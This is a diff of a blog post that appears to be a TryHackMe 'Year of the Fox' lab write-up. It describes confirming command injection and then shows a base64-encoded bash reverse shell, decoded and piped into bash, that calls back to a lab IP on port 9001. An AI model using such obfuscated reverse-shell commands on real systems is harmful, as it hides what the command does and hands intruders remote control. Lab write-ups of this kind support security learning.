BLUEBERRYP1LL/blueberryp1ll.github.io/_posts/2025-08-06-THM-Year-of-the-Fox-writeup.md

 <img width="2873" height="1074" alt="2025-08-07 154848" src="https://github.com/user-attachments/assets/f6b308c7-df81-42b9-8de3-5df4b4c44c83" />

-Command injection confirmed.

-Tried multiple reverse shell payloads but all of them didn’t work for unknown reasons.
+Command injection confirmed, so we can create a payload now and get a shell.
+But I Tried multiple reverse shell payloads and all of them didn’t work for unknown reasons.
 Eventually i created a base64 encoded one and it worked.

 ```bash
 echo 'YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjkuMS4xMDQvOTAwMSAwPiYxIgo=' | base64 -d  | bash